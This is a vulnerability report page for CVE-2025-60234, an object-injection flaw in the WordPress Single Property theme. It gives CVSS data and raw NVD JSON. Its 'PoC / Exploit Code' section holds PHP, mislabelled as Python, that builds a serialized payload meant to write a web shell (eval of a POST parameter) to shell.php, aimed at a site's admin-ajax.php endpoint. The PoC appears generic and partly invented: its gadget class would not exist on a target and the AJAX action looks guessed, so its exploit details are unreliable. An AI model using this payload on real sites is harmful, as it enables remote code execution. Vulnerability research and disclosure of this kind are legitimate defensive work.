Security Vulnerability Report
中文
CVE-2025-60234 CVSS 8.8 HIGH

CVE-2025-60234

Published: 2025-10-22 15:16:00
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in designthemes Single Property single-property allows Object Injection.This issue affects Single Property: from n/a through <= 2.8.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Single Property Theme <= 2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60234 PoC - WordPress Single Property Object Injection * Author: Security Research * Note: This PoC is for educational and security testing purposes only */ class EvilClass { public $filename; public $data; function __destruct() { // Attempt to write arbitrary content (file operation) file_put_contents($this->filename, $this->data); } } // Generate malicious serialized payload $evil_obj = new EvilClass(); $evil_obj->filename = 'shell.php'; $evil_obj->data = '<?php @eval($_POST["cmd"]); ?>'; $payload = serialize($evil_obj); echo "Malicious Payload: " . $payload . "\n"; echo "URL Encoded: " . urlencode($payload) . "\n"; // Attack vector example (to be used with appropriate WordPress endpoint) $target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; $data = array( 'action' => 'single_property_action', 'property_data' => $payload ); ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60234", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:00.260", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in designthemes Single Property single-property allows Object Injection.This issue affects Single Property: from n/a through <= 2.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/single-property/vulnerability/wordpress-single-property-theme-2-8-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}